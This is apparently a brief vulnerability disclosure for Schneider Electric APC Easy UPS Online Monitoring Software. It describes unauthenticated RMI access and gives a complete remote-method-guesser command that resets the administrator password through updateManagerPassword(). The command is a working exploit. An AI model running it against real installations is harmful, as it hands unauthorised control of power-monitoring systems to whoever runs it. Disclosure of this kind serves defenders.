A vulnerability in Schneider Electric APC Easy UPS Online Monitoring Software V2.5-GS-01-22320 allows an unauthenticated remote attacker to issue RMI calls to certain remote Java objects in the application.

For example, the attacker can invoke cn.com.voltronicpower.rmiclass.SystemService.updateManagerPassword() to change the administrator password for the monitoring software.


- Install remote-method-guesser (
- Run: java -jar rmg-4.3.1-jar-with-dependencies.jar call  41009 '"482c811da5d5b4bc6d497ffa98491e38"' --signature 'String updateManagerPassword(String managerPassword)' --bound-name system
- This command attempts to change the application's Administrator password to "password123" (without quotes)
- To reset to a different password, replace 482c811da5d5b4bc6d497ffa98491e38 with the MD5 hash hex string of a given password

Leave a Reply

Your email address will not be published. Required fields are marked *